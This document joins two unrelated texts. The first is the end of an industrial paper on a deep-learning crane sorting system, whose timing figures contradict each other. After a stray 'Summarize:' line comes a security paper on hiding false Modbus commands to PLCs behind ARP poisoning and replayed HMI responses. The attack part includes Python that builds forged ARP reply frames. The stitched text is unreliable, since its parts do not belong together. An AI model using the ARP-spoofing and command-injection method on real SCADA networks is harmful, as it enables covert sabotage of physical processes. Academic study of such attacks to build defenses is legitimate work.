The X-axis shows the three images, which are captured at different positions, and the Y-axis is the average distance error for each image. BP with linear interpolation achieves the best performance, with an average distance error of 0.007 cm, which is lower by 0.067 and 0.02 cm across all images. This further proves the significance of BP with linear interpolation for camera calibration in the visual sorting system.

E. Experimental Results of the Whole Visual Sorting System in the Virtualized PLC Environment

After camera calibration, the C-PLC receives the world coordinates, types, and timestamps from the server and sends commands to the F-vPLCs, which control the cranes to suck up the materials. In the experiment, we use two kinds of chess pieces instead of industrial items because of the load-bearing capacity of the cranes and the suction capacity of the air pumps. One crane, responsible for sorting the red chess pieces and putting them into the red box, works in coordination with another crane that sorts the black chess pieces and puts them into the black box.

TABLE IV. DISTANCE ERROR OF TRADITIONAL CALIBRATION, BP WITHOUT AND WITH LINEAR INTERPOLATION

Fig. 15. Undetected rate of red and black chess pieces under different conveyor belt speeds.

Fig. 16. Accuracy and time requirements of the multicrane sorting system under different conveyor belt speeds.

The undetected rates of red and black chess pieces are shown in Fig. 15. The performance is compared under different conveyor belt speeds, which are set to 1.5, 2.8, 4.0, and 5.2 m/min. A total of 200 chess pieces are placed on the conveyor belt for one test.
There are 100 red chess pieces and 100 black chess pieces. The performance of the crane sorting system gradually degrades with increasing speed. The best undetected rate is 0.035, obtained at a speed of 1.5 m/min, which is 0.07 lower than the undetected rate at 5.2 m/min. The working process of the mechanical arm includes acceleration and deceleration, which causes jitter, and the crane cannot pick up all chess pieces if the conveyor belt runs too fast, which explains the missed pieces. Hence, the stability and reliability of the crane system should be improved for fast-running scenes, especially when more materials need to be sorted on the conveyor belt.

Fig. 17. Experimental diagram of the crane visual sorting system.

The accuracy and time requirements of the whole crane sorting system under different conveyor belt speeds are shown in Fig. 16. The accuracy is the ratio of the number of correctly sorted chess pieces to 200; the time is the time consumed for sorting 200 chess pieces in one test. The best accuracy, 96.5%, is achieved at 1.5 m/min and is 7% higher than the accuracy at 5.2 m/min. The time spent at 1.5 m/min is 3.424 s, an increase of 1.115 s over the time spent at 5.2 m/min; the time to extract each chess piece is approximately 3.432 s when the belt moves at 1.5 m/min, which satisfies most industrial applications. With the increase in speed, the accuracy and time present opposite trends, for the same reason as the undetected rate. The
main influencing factors are the movement process of the mechanical arm, which leads to massive jitter, and the fact that the air pump cannot supply the needed amount of air in the fast-sorting scene. We can adjust the running speed appropriately to meet industrial requirements according to the realistic application.

The experimental results of the crane visual sorting system are shown in Fig. 17: the two kinds of chess pieces are correctly sorted into the designated boxes in real time.

V. CONCLUSION

In this article, a multicrane visual sorting system based on deep learning with virtualized PLCs was investigated, in which two cranes cooperate to sort materials on a conveyor belt in real time. C-PLCs and F-vPLCs were employed in the cloud and in the field to assist the cooperation of the two cranes in a TSN environment, achieving highly reliable and stable communication. A YOLOv5-based visual recognition architecture was introduced to locate the materials and obtain their types. To determine the precise coordinates of the materials in the crane coordinate system, a new linear interpolation-based BP network was proposed to provide the relation between the pixel coordinate system and the world coordinate system. We demonstrated the performance of the proposed scheme on real sorting datasets. For future work, many potential applications with intelligent algorithms can utilize the proposed scheme. We will employ C-PLCs in 5G mobile edge computing [44] and control the crane visual sorting system to meet industrial application requirements.

REFERENCES

[1] R. Y. Zhong, X. Xu, E. Klotz, and S. T. Newman, "Intelligent manufacturing in the context of industry 4.0: A review," Engineering, vol. 3, no. 5, pp. 616-630, 2017.
[2] C. Zhang and Y. Lu, "Study on artificial intelligence: The state of the art and future prospects," J. Ind. Inf. Integr., vol. 23, 2021, Art. no. 100224.
[3] J. Chen, K. Li, Keqin Li, P. S. Yu, and Z.
Zeng, "Dynamic planning of bicycle stations in dockless public bicycle-sharing system using gated graph neural network," ACM Trans. Intell. Syst. Technol., vol. 12, no. 2, 2021, Art. no. 25.
[4] A. Mahmood et al., "Industrial IoT in 5G-and-beyond networks: Vision, architecture, and design trends," IEEE Trans. Ind. Inform., vol. 18, no. 6, pp. 4122-4137, Jun. 2022.
[5] X. Li, J. Wan, H.-N. Dai, M. Imran, M. Xia, and A. Celesti, "A hybrid computing solution and resource scheduling strategy for edge computing in smart manufacturing," IEEE Trans. Ind. Inform., vol. 15, no. 7, pp. 4225-4234, Jul. 2019.
[6] A. G. Frank, L. S. Dalenogare, and N. F. Ayala, "Industry 4.0 technologies: Implementation patterns in manufacturing companies," Int. J. Prod. Econ., vol. 210, pp. 15-26, 2019.
[7] M.-F. Körner et al., "Extending the automation pyramid for industrial demand response," Procedia CIRP, vol. 81, pp. 998-1003, 2019.
[8] S. Biallas, J. Brauer, and S. Kowalewski, "Arcade.PLC: A verification platform for programmable logic controllers," in Proc. IEEE/ACM 27th Int. Conf. Autom. Softw. Eng., 2012, pp. 338-341.
[9] M. A. Sehr et al., "Programmable logic controllers in the context of industry 4.0," IEEE Trans. Ind. Inform., vol. 17, no. 5, pp. 3523-3533, May 2021.
[10] Y. Wang, K. Hong, J. Zou, T. Peng, and H. Yang, "A CNN-based visual sorting system with cloud-edge computing for flexible manufacturing systems," IEEE Trans. Ind. Inform., vol. 16, no. 7, pp. 4726-4735, Jul. 2020.
[11] B. Pu, K. Li, S. Li, and N. Zhu, "Automatic fetal ultrasound standard plane recognition based on deep learning and IIoT," IEEE Trans. Ind. Inform., vol. 17, no. 11, pp. 7771-7780, Nov. 2021.
[12] L. Liu et al., "Deep learning for generic object detection: A survey," Int. J. Comput. Vis., vol. 128, no. 2, pp. 261-318, 2020.
[13] L. Song, W. Wu, J. Guo, and X. Li, "Survey on camera calibration technique," in Proc. IEEE 5th Int. Conf. Intell. Human-Mach. Syst. Cybern., 2013, pp. 389-392.
[14] S. C. Park, C. M.
Park, and G. N. Wang, "A PLC programming environment based on a virtual plant," Int. J. Adv. Manuf. Technol., vol. 39, no. 11, pp. 1262-1270, 2008.
[15] S. C. Park and M. Chang, "Hardware-in-the-loop simulation for a production system," Int. J. Prod. Res., vol. 50, no. 8, pp. 2321-2330, 2012.
[16] T. Goldschmidt, M. K. Murugaiah, C. Sonntag, B. Schlich, S. Biallas, and P. Weber, "Cloud-based control: A multi-tenant, horizontally scalable soft-PLC," in Proc. IEEE 8th Int. Conf. Cloud Comput., 2015, pp. 909-916.
[17] W. Mahnke, S. H. Leitner, and M. Damm, OPC Unified Architecture. Berlin, Germany: Springer, 2009.
[18] S. Kalle, N. Ameen, H. Yo, and I. Ahmed, "CLIK on PLCs! Attacking control logic with decompilation and virtual PLC," in Proc. Workshop Binary Anal. Res., 2019, pp. 1-12.
[19] J. Chen, K. Li, K. Bilal, X. Zhou, K. Li, and P. S. Yu, "A bi-layered parallel training architecture for large-scale convolutional neural networks," IEEE Trans. Parallel Distrib. Syst., vol. 30, no. 5, pp. 965-976, May 2019.
[20] Z. Zou et al., "Object detection in 20 years: A survey," Proc. IEEE, vol. 111, no. 3, pp. 257-276, Mar. 2023.
[21] J. Redmon, S. Divvala, R. Girshick, and A. Farhadi, "You only look once: Unified, real-time object detection," in Proc. IEEE Conf. Comput. Vis. Pattern Recognit., 2016, pp. 779-788.
[22] W. Liu et al., "SSD: Single shot multibox detector," in Proc. Eur. Conf. Comput. Vis., 2016, pp. 21-37.
[23] S. Ren, K. He, R. Girshick, and J. Sun, "Faster R-CNN: Towards real-time object detection with region proposal networks," IEEE Trans. Pattern Anal. Mach. Intell., vol. 39, no. 6, pp. 1137-1149, Jun. 2017.
[24] C. Chen, C. Wang, B. Liu, C. He, L. Cong, and S. Wan, "Edge intelligence empowered vehicle detection and image segmentation for autonomous vehicles," IEEE Trans. Intell. Transp. Syst., to be published, doi: 10.1109/TITS.2022.3232153.
[25] Y. Song, L. Gao, X. Li, and W.
Shen, "A novel robotic grasp detection method based on region proposal networks," Robot. Comput.-Integr. Manuf., vol. 65, 2020, Art. no. 101963.
[26] G. Jocher et al., "yolov5," Code repository, 2020. [Online]. Available: https://github.com/ultralytics/yolov5
[27] Y. Hold-Geoffroy et al., "A perceptual measure for deep single image camera calibration," in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit., 2018, pp. 2354-2363.
[28] Z. Zhang, "A flexible new technique for camera calibration," IEEE Trans. Pattern Anal. Mach. Intell., vol. 22, no. 11, pp. 1330-1334, Nov. 2000.
[29] C. A. I. Sheng, L. I. Qing, and Q. Yan-feng, "Camera calibration of attitude measurement system based on BP neural network," J. Optoelectron. Laser, vol. 18, no. 7, pp. 832-834, 2007.
[30] S. N. Raza et al., "Artificial intelligence based camera calibration," in Proc. 15th Int. Wireless Commun. Mobile Comput. Conf., 2019, pp. 1564-1569.
[31] S. Sudhakaran, K. Montgomery, M. Kashef, D. Cavalcanti, and R. Candell, "Wireless time sensitive networking impact on an industrial collaborative robotic workcell," IEEE Trans. Ind. Inform., vol. 18, no. 10, pp. 7351-7360, Oct. 2022.
[32] C. Gomez, A. Arcia-Moret, and J. Crowcroft, "TCP in the Internet of Things: From ostracism to prominence," IEEE Internet Comput., vol. 22, no. 1, pp. 29-41, Jan./Feb. 2018.
[33] C. DeCusatis, R. M. Lynch, W. Kluge, J. Houston, P. A. Wojciak, and S. Guendert, "Impact of cyberattacks on precision time protocol," IEEE Trans. Instrum. Meas., vol. 69, no. 5, pp. 2172-2181, May 2020.
[34] C.-Y. Wang, H.-Y. M. Liao, Y.-H. Wu, P.-Y. Chen, J.-W. Hsieh, and I.-H. Yeh, "CSPNet: A new backbone that can enhance learning capability of CNN," in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit. Workshops, 2020, pp. 1571-1580.
[35] J. Redmon, "DarkNet: Open source neural networks in C," 2013. [Online]. Available: http://pjreddie.com/darknet/
[36] S. Liu, L. Qi, H. Qin, J. Shi, and J.
Jia, "Path aggregation network for instance segmentation," in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit., 2018, pp. 8759-8768.
[37] T.-Y. Lin, P. Dollar, R. Girshick, K. He, B. Hariharan, and S. Belongie, "Feature pyramid networks for object detection," in Proc. IEEE Conf. Comput. Vis. Pattern Recognit., 2017, pp. 936-944.
[38] H. Rezatofighi, N. Tsoi, J. Gwak, A. Sadeghian, I. Reid, and S. Savarese, "Generalized intersection over union: A metric and a loss for bounding box regression," in Proc. IEEE/CVF Conf. Comput. Vis. Pattern Recognit., 2019, pp. 658-666.
[39] I. Chamveha et al., "Automated cardiothoracic ratio calculation and cardiomegaly detection using deep learning approach," 2020, arXiv:2002.07468.
[40] V. Nair and G. E. Hinton, "Rectified linear units improve restricted Boltzmann machines," in Proc. Int. Conf. Mach. Learn., 2010, pp. 807-814.
[41] M. Mathieu, C. Couprie, and Y. LeCun, "Deep multi-scale video prediction beyond mean square error," 2015, arXiv:1511.05440.
[42] P. Henderson and V. Ferrari, "End-to-end training of object class detectors for mean average precision," in Proc. Asian Conf. Comput. Vis., 2016, pp. 198-213.
[43] D. P. Kingma et al., "Adam: A method for stochastic optimization," 2014, arXiv:1412.6980.
[44] F. Spinelli and V. Mancuso, "Toward enabled industrial verticals in 5G: A survey on MEC-based approaches to provisioning and flexibility," IEEE Commun. Surveys Tut., vol. 23, no. 1, pp. 596-630, Jan./Mar. 2021.

Meixia Fu received the B.S. degree in communication engineering from the Qingdao University of Science and Technology, Qingdao, China, in 2014, and the Ph.D.
degree in information and communication engineering from the Beijing University of Posts and Telecommunications, Beijing, China, in 2021. She is currently a Postdoctoral Research Associate with the University of Science and Technology Beijing, Beijing, China. Her research interests include the industrial Internet of Things, intelligent manufacturing, environmental perception, artificial intelligence, computer vision, and image processing.
Zhenqian Wang received the B.Eng. degree in intelligent science and technology from the School of Automation, University of Science and Technology Beijing, Beijing, China, in 2021, where he is currently working toward the master's degree in electronic information with the Institute of Industrial Internet. His current research interests include the industrial Internet of Things, intelligent manufacturing, computer vision, deep learning, and depth estimation.
Jianquan Wang received the doctoral degree in communication engineering from the Beijing University of Posts and Telecommunications, Beijing, China, in 2003. Since 2020, he has been a Professor with the University of Science and Technology Beijing, Beijing, China. He is a leader of scientific and technological innovation of the National Ten Thousand Talents Program, one of the young and middle-aged leading talents of the Ministry of Science and Technology, and an expert enjoying the special allowance of the State Council. He has presided over and participated in more than ten special projects, including 863 and NSFC projects and major projects supported by the Ministry of Science and Technology, as well as National Science and Technology major special projects. He has published more than 100 articles, been granted more than 40 invention patents, and submitted more than 60 international standard manuscripts. His research interests include the Industrial Internet and heterogeneous network collaboration, network systems, key technologies, and network security.
Qu Wang received the B.S.
degree in information and communication engineering from the School of Software Engineering, Beijing University of Posts and Telecommunications, Beijing, China, in 2014, the M.S. degree in information and communication engineering from the University of Chinese Academy of Sciences, Beijing, China, in 2017, and the Ph.D. degree in information and communication engineering from the Beijing University of Posts and Telecommunications, Beijing, China, in 2021. He is currently an Associate Professor with the University of Science and Technology Beijing, Beijing, China. His research interests include location-based services, context awareness, pervasive computing, the industrial Internet of Things, and artificial intelligence.
Zhangchao Ma received the bachelor's and doctoral degrees in communication engineering from the Beijing University of Posts and Telecommunications, Beijing, China, in 2002 and 2011, respectively. From 2017 to 2020, he was with Guoke Quantum Communication Network Company Ltd. From 2011 to 2017, he was with the Network Technology Research Institute, China Unicom Research Institute, Beijing. Since May 2020, he has been an Associate Professor with the University of Science and Technology Beijing, Beijing. He has participated in multiple funded research grants, including National Major Special Projects. His research interests include industrial delay-sensitive networks, network endogenous security, quantum secure communication, and B5G.
Danshi Wang (Senior Member, IEEE) received the Ph.D. degree in electromagnetic field and microwave technology from the Beijing University of Posts and Telecommunications (BUPT), Beijing, China, in 2016. He is currently an Associate Professor with the State Key Laboratory of Information Photonics and Optical Communications, BUPT. He has proposed and verified a series of AI-driven communication and network technology solutions, which have been applied to telecom operators and Internet service providers.
He has authored or coauthored more than 160 technical papers in international journals and conferences, including 20 invited talks at ECOC/ACP/OECC/ICAIT. He has held and participated in multiple funded research grants, including the National Key R&D Program of China, the National Natural Science Foundation of China, and the Fundamental Research Funds for the Central Universities. His research interests include intelligent communication and networks, artificial intelligence (AI), digital twin networks, and AI for science.
Summary:
We develop a deep-learning-based multicrane visual sorting system with virtualized programmable logic controllers (PLCs) in intelligent manufacturing, which enables the accurate location and suction of the materials on the conveyor belt. First, virtualized PLCs are deployed in the field and the cloud to break data islands for efficient communication between low-level devices. Second, artificial intelligence algorithms are integrated into the physical industrial control system, in which cooperation between virtualized PLCs and the visual recognition model is developed to complete the industrial control closed loop. Third, we establish a visual recognition model in which object detection algorithms are used to process the original image and then obtain the position and type of the object in the pixel coordinate system. In addition, a new linear-interpolation-based backpropagation neural network is presented to provide the transform relation between the pixel coordinate system and the world coordinate system that the crane needs to precisely suck the material. The whole system is applied in a time-sensitive network environment in a highly reliable and stable manner. The experimental prototype system demonstrates that high recognition accuracy can be achieved for the visual sorting system within an acceptable time frame. The accuracy of the sorting task reaches 96.5%, and the average consumption time of each object is approximately 2.317 s when the speed of the conveyor belt is 5.2 m/min.
Manuscript received 1 January 2023; revised 8 March 2023 and 28 July 2023; accepted 27 August 2023. Date of publication 22 September 2023; date of current version 23 February 2024. This work was supported in part by the National Key Research and Development Program under Grant 2020YFB1708800, in part by the Guangdong Key Research and Development Program under Grant 2020B0101130007, in part by the Fundamental Research Funds for Central Universities under Grant FRF-MP-20-37, in part by the Guangdong Basic and Applied Basic Research Foundation under Grant 2021A1515110577, in part by the China Postdoctoral Science Foundation under Grant 2021M700385, and in part by the Central Guidance on Local Science and Technology Development Fund of Shanxi Province under Grant YDZJSX2022B019. Paper no. TII-23-0005. (Corresponding author: Jianquan Wang.)
Meixia Fu, Zhenqian Wang, Jianquan Wang, Qu Wang, and Zhangchao Ma are with the School of Automation and Electrical Engineering, Institute of Industrial Internet, University of Science and Technology Beijing, Beijing 100083, China (e-mail: mxfu1205@ustb.edu.cn; m202120722@xs.ustb.edu.cn; wangjianquan@ustb.edu.cn; wangqu@ustb.edu.cn; mazhangchao@ustb.edu.cn).
Danshi Wang is with the State Key Laboratory of Information Photonics and Optical Communications, Beijing University of Posts and Telecommunications, Beijing 100876, China (e-mail: danshi_wang@bupt.edu.cn).
Color versions of one or more figures in this article are available at https://doi.org/10.1109/TII.2023.3313641.
Digital Object Identifier 10.1109/TII.2023.3313641
Summarize:
Index Terms: SCADA; PLCs; ICSs; Modbus Protocol; Cyber-attacks; Command Injection Attacks
I. INTRODUCTION
Supervisory Control and Data Acquisition (SCADA) systems are employed by millions of industries and plants to monitor and control critical physical processes such as oil and gas facilities, water treatment systems, nuclear plants, electrical power grids, etc. SCADA systems provide users with fully automated control, as well as remote access and service monitoring. Typical SCADA systems consist of different industrial components, e.g., Engineering Work Stations (EWSs), Human Machine Interfaces (HMIs), Programmable Logic Controllers (PLCs), Input/Output (I/O) modules, sensors, valves, motors, and others [1]. Due to the necessity of remote management in critical infrastructures, SCADA systems are increasingly connected to Ethernet and Transmission Control Protocol/Internet Protocol (TCP/IP) based networks, e.g., the Internet, as well as to Virtual Private Network (VPN)-based remote access, to reduce maintenance costs [2]. Unfortunately, this connectivity brings its own risks and exposes millions of systems to cyber-attacks from the outer world that did not exist in the air-gapped era [3]. The security of SCADA systems has recently been a major focus of cyber-security researchers and industrial engineers due to the critical role these systems play in any automation company. It is no secret that many old SCADA components with no security measures are still operating in many critical plants, for two major reasons. First, industrial devices have a long life-cycle (twenty years or longer), which results in their not being security patched (up to date) for a long time. Second, there may be legacy devices that are not compatible with newer, security-improved protocols. Therefore, we should expect that many insecure SCADA devices are placed in remote locations and linked to the outer world via the Internet.
Thus, if a skilled adversary gains access to a SCADA network, he can perform malicious attacks to disrupt the physical process that the target system controls, which eventually might cause serious damage, as Stuxnet [4], BlackEnergy [5], Shamoon [6], Kemuri [7], and the German Steel Mill attack [8] showed. Along with the system-level security concerns, SCADA protocols such as Modbus, the Distributed Network Protocol (DNP3), High-Level Data Link Control (HDLC), International Electrotechnical Commission (IEC) 60870, etc., are substantially vulnerable and lack fundamental security mechanisms [9]. All these protocols provide client/server communications between different SCADA devices connected on different buses or networks. The Modbus protocol [10] is believed to be the most common industrial protocol, implemented by hundreds of vendors on thousands of device models to transfer digital/analog inputs/outputs and register data between connected devices, e.g., HMIs and PLCs. Although Modbus provides the industrial community with simplicity, applicability, and efficiency, it contains multiple vulnerabilities that have allowed attackers to exploit the insecurity of the protocol and conduct different attacks, e.g., reconnaissance activity, command injection, data injection, access injection, etc. Hijacking the interconnection between PLC and HMI devices represents the most often used attack scenario targeting SCADA systems using Modbus, such as the one that occurred in the Maroochy water breach [11]. In this work, we introduce a stealthy False Command Injection (FCI) attack approach based on integrating a database containing real Modbus request-response pairs between PLC and HMI devices. The database is created prior to the launch of our attack, i.e., offline.
CCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23). 978-1-6654-9734-3/23/$31.00 2023 IEEE. DOI: 10.1109/CCNC51644.2023.10059804
In our approach, an attacker placed in a man-in-the-middle (MITM) position intercepts the Modbus requests sent from the HMI, dropping them from the network so they do not reach the PLC, compares them to the ones existing in his database, and then replies to the HMI with the expected responses. Meanwhile, he can inject the PLC with false commands, i.e., send malicious requests that alter inputs or outputs, causing dangerous behavior at will. In other words, our approach effectively decouples the PLC from the HMI, i.e., it generates two independent communication flows: one between the PLC and the attacker, and the other between the attacker and the HMI. This scenario is quite severe, as the SCADA operator is tricked in a way that he is always shown fake views while the PLC is processing malicious commands sent by the attacker. For a practical implementation, we conducted our approach on a virtual SCADA system based on OpenPLC (https://openplcproject.com/) and ScadaBR (http://www.scadabr.com.br/) software. This is due to logistic constraints and the difficulty of using real-world SCADA systems for research purposes. Finally, we suggest some security countermeasures and mitigation solutions to prevent such a serious threat. The rest of the paper is structured as follows. Section II discusses related works, while Section III provides a security overview of the Modbus protocol. In Section IV, we illustrate our attack approach, and we show the implementation as well as the resulting evaluation in Section V.
Finally, we suggest some security countermeasures and appropriate mitigation solutions in Section VI, and conclude this paper in Section VII.
II. RELATED WORK
The Modbus protocol is very simple, efficient, and publicly free; on the other hand, it has many vulnerabilities that allow an adversary to perform reconnaissance activity or issue arbitrary commands. Possible vulnerabilities in the Modbus specification and major implementations of the protocol were investigated by Hitsi [12]. Such weaknesses can be exploited to perform spoofing, replay, and flooding attacks. Morris et al. [13] illustrated theoretical data injection and Denial of Service (DoS) attacks against industrial equipment that relies on Modbus. Such attacks stem from the protocol's insufficient security measures for data integrity and availability. Morris, in a follow-up work [14], described and tested reconnaissance, response injection, command injection, and DoS attacks, and also elaborated on several standalone and stateful Intrusion Detection System (IDS) rules in an attempt to deter such incidents. Nardone et al. [15] formally analyzed and assessed the Modbus protocol in terms of the security features each variant provides. The work by Tsalis et al. [16] demonstrated that even in the presence of encryption, side-channel attacks might reveal information about Modbus protocol messages. Using a testbed comprising virtual machines running on Linux, Parian et al. [17] detailed two attacks, namely manipulation of packets via malware-infected hosts and classic MITM attacks, i.e., Address Resolution Protocol (ARP) poisoning. Rosa et al. [2] showed the implementation of a set of attacks targeting a Hybrid Environment for Design and Validation (HEDVa). For a practical attack scenario, the authors built and configured a small testbed controlled by Modbus PLCs.
As a part of their work, they conducted network reconnaissance and a MITM attack, and finally injected PLCs with dangerous Read/Write (R/W) coils requests. All the aforementioned works focused on confusing the physical processes controlled by exposed PLCs using the vulnerabilities of the Modbus protocol. However, the SCADA operator could detect and disclose these attacks easily, as he can observe abnormal changes displayed on the HMIs. In our paper, we overcome this challenge and conceal our attack by sending the HMI fake views similar to the ones it expects to receive, as illustrated in Section IV.
III. MODBUS PROTOCOL AND VULNERABILITIES
Modbus is an application layer messaging protocol located at the seventh level of the OSI model (https://www.fortinet.com/resources/cyberglossary/osi-model). It provides master/slave communication between devices connected on different buses and networks. Figure 1 depicts a typical SCADA communication where a data acquisition server or an HMI runs as a Modbus client component (master) and a PLC runs as its pair device, that is, a server component (slave).
Fig. 1: Example of interaction between Modbus master and slave devices
The master device (HMI) sends a Modbus request to the connected slave device (PLC) to poll the data. The PLC replies to the request with a Modbus response to the HMI. If the request is not correct, the PLC sends an exception response to the HMI. Figure 2 shows the architecture of a Modbus frame encapsulated over the TCP/IP protocol. The Function Code field determines the action the PLC is required to perform. Table I gives the details of some function codes and their corresponding actions. These function codes are the most frequently used in interactions between PLCs and HMIs in SCADA systems. The Modbus protocol itself lacks various security features, which exposes it to cyber-attacks hijacking the Modbus communication between connected devices and manipulating the frames to inject false commands/data into the PLC. In the following, we list the most reported vulnerabilities in the Modbus protocol as described in [19]-[21]:
Fig. 2: Modbus TCP/IP frame format, adopted from [18]
Table I: Function codes and their corresponding actions
0x01 - Read Coil Status
0x02 - Read Discrete Input
0x03 - Read Holding Registers
0x04 - Read Input Registers
0x05 - Write Single Coil
0x06 - Write Single Holding Register
0x0F - Write Multiple Coils
0x10 - Write Multiple Holding Registers
0x11 - Report Slave ID
- Integrity of the Modbus frame is not verified by peer devices [22], [23]. A frame can be altered by an attacker, and peer devices cannot detect this manipulation.
- There is no facility for maintaining the confidentiality of messages. Modbus frames are transferred in plain text, and any attacker placed in a MITM position can sniff a packet and access the frame information.
- Frames do not carry time-stamps. This is one of the critical problems, because peer devices cannot know whether a received response corresponds to a recent or an old request. Therefore, manipulation may go unnoticed due to a mismatch of real-time field values.
- Modbus is an open protocol and has a simple frame format. Thus, a network analyzer tool such as Wireshark (https://www.wireshark.org/) can be used by an attacker to retrieve information from the network.
As a result of lacking the aforementioned security measures, Modbus is highly vulnerable to various cyber-attacks such as MITM attacks in the form of False Command Injection (FCI), False Access Injection (FAI), False Response Injection (FRI), replay attacks, and DoS attacks [24]-[27].
IV. ATTACK DESCRIPTION
Figure 3 shows a high-level overview of the attack scenario we perform to inject the PLC with false commands without being noticed by the HMI device. To this end, we first need to discover the network topology of the target system, then collect Modbus TCP/IP packets from the network traffic to create our database, which eventually contains real request-response interaction pairs. These two steps are done prior to our injection attack. After collecting the needed pairs, we start our main attack by poisoning the ARP cache of the connected devices, i.e., the HMI and PLC, and then inject the target PLC with false commands while we send the expected response packet upon each request to the HMI. This conceals our attack, and the SCADA operator will always be shown the fake views he expects to see. In the following, we elaborate each attack step in detail.
A. Pre-Attack Phase (Offline)
Here, the attacker aims to get an overview of the network topology, open ports, connected devices, and communication protocols used in the target system. Then, he sniffs and collects real interactions between the HMI and PLC, i.e., the request-response pairs that both stations exchange over Modbus TCP/IP frames.
1) Network Reconnaissance: Discovering the network is the first step an attacker needs to take, meant to collect information about all the components of the SCADA environment and to identify the network topology, hosts, and services. For instance, industrial devices such as PLCs and HMIs are identified by IP and Media Access Control (MAC) addresses, operating system versions, and a set of services. To obtain these addresses and information, we used the NMAP port scanner (https://nmap.org/), which identifies the Modbus protocol on the network. Figure 4 shows the scanning process, where synchronize (SYN) packets are sent from the attacker machine over the network.
Fig. 3: High-level overview of our attack approach
Fig. 4: Network reconnaissance attack
Using this technique, SYN packets can scan thousands of ports per second, owing to the fact that the TCP connection is not fully established (half-open communication). Therefore, the scan is difficult to detect with default network rules.
2) Sniffing and Collecting Data: The NMAP tool provides the attacker only a network-level perspective on the target system; it does not provide process-level information, which is required to implement sophisticated attacks. Thus, in the next step the attacker listens to the network traffic and captures each Modbus TCP/IP request frame sent from the HMI along with its corresponding Modbus response(s) from the PLC. To this end, we first run a network analyzer such as Wireshark. Our investigations showed that each request and its corresponding response(s) share the same Transaction Identifier (TID), Unit ID (which identifies the addressed slave device), and Function Code. Encapsulated Modbus protocol messages can therefore be extracted and grouped into request-response pairs based on those three parameters. Figure 5 shows an example of a Modbus interaction between PLC and HMI devices where the response from the PLC consists of two frames, and all the frames (request and response) share the same values: 0x19bd in TID, 0x02 in Unit ID, and 0x03 in Function Code.
Fig. 5: Example of a Modbus request-response interaction between PLC and HMI
Based on those parameters, an attacker can easily extract and pair the Modbus packets as request-response frames. Moreover, he can analyze the packets more deeply and gather more detailed information about how each Modbus register affects the others. To speed up the comparison process during the injection, all duplicate pairs are eliminated, as depicted in Figure 6. Note that duplicated messages can exist if there is a periodic status check between the PLC and HMI. Finally, to collect a sufficient number of request-response pairs, the sniffing process should last a reasonably long period of time; in this work, we sniffed the network for approximately 30 minutes. For our virtual SCADA system presented in Figure 9, we successfully created a database containing 18 request-response pairs. It is worth mentioning that pairing the captured Modbus frames in our database into request-response frames helps the attacker win the strict race condition that the HMI and PLC must meet before he replies with his forged Modbus response frame to the HMI.
B. Attack Phase (Online)
At the end of the previous stage, the attacker has the Modbus request-response frames that are frequently exchanged between the HMI and PLC. He can then start his major attack by first placing himself between the HMI and PLC (MITM position). This step is done using the well-known ARP poisoning approach. All messages then go through the attacker's machine; the attacker drops each received request frame from the network, compares it to the ones existing in the database, and finally responds to the HMI with the expected correct response. In the meantime, the attacker sends the PLC a malicious request frame, e.g., a R/W coils request, and also drops the original response sent from the PLC to the HMI. In the following, we illustrate this phase in detail.
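The database-building step described above (grouping captured frames by Transaction ID, Unit ID, and Function Code, then dropping duplicate pairs) can be sketched as follows. The helper names `mbap_key` and `pair_frames`, and the in-memory dict standing in for the pcap-backed storage, are our assumptions; the capture itself is assumed to happen elsewhere.

```python
import struct
from collections import defaultdict

def mbap_key(frame: bytes):
    """(Transaction ID, Unit ID, Function Code) of a Modbus/TCP frame."""
    tid, _proto, _length, unit = struct.unpack(">HHHB", frame[:7])
    return tid, unit, frame[7]

def pair_frames(requests, responses):
    """Map each unique request frame to the response frame(s) sharing
    its key; duplicate requests are skipped, mirroring Figure 6."""
    by_key = defaultdict(list)
    for rsp in responses:
        by_key[mbap_key(rsp)].append(rsp)
    database = {}
    for req in requests:
        key = mbap_key(req)
        if key in by_key and req not in database:
            database[req] = by_key[key]
    return database
```

Multi-frame responses fall out naturally: every response frame with the same key ends up in the same list, as in the two-frame example of Fig. 5.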
Fig. 6: Scheme of creating our database
1) ARP Poisoning (MITM) Approach: An ARP poisoning attack comprises two parts: ARP spoofing and communication hijacking. In the first stage, an attacker manipulates the ARP cache of both the PLC and HMI devices by broadcasting malicious, forged "is-at" ARP messages over the network, as depicted in Figure 7. This technique forces both devices to send their packets through the attacker's MAC address, and requires the attacker to know only the IP and MAC addresses of the victims (e.g., HMI and PLC), which were already obtained in the early steps of the pre-attack phase.
Fig. 7: ARP poisoning attack
As soon as the ARP cache of each victim is spoofed, the traffic is redirected through the attacker's machine. At this point, the attacker is capable of reading all the Modbus messages transmitted between the HMI and PLC and then forwarding them to their final destinations (interception attack), or of actively changing them before pushing them back to the network (modification attack). Note that the HMI should keep receiving realistic state updates while the HMI-PLC interactions are decoupled; for this purpose, the adversary should reply to each Modbus request in real time. Moreover, TCP session hijacking requires the attacker to maintain the integrity of the TCP connection, e.g., appropriate TCP sequence numbers, to avoid losing the connection.
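At the byte level, the forged "is-at" message of the ARP poisoning step is just an Ethernet II frame carrying an ARP reply (opcode 2) whose sender fields pair the victim's IP with the attacker's MAC. The sketch below only constructs the 42-byte frame; actually emitting it needs a raw socket (root privileges) and is deliberately omitted, and all addresses are placeholders.

```python
import struct

def forge_arp_reply(attacker_mac: bytes, victim_mac: bytes,
                    spoofed_ip: bytes, victim_ip: bytes) -> bytes:
    """ARP reply claiming `spoofed_ip` is-at `attacker_mac`."""
    eth = victim_mac + attacker_mac + struct.pack(">H", 0x0806)  # EtherType ARP
    # htype=Ethernet, ptype=IPv4, hlen=6, plen=4, opcode=2 (reply)
    arp = struct.pack(">HHBBH", 1, 0x0800, 6, 4, 2)
    arp += attacker_mac + spoofed_ip + victim_mac + victim_ip
    return eth + arp

frame = forge_arp_reply(
    attacker_mac=bytes.fromhex("aabbccddeeff"),   # placeholder MACs
    victim_mac=bytes.fromhex("112233445566"),
    spoofed_ip=bytes([192, 0, 2, 10]),            # IP being impersonated
    victim_ip=bytes([192, 0, 2, 20]),
)
```

Sending one such frame per victim (PLC and HMI, each with the other's IP spoofed) redirects both directions of the Modbus traffic through the attacker's machine.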
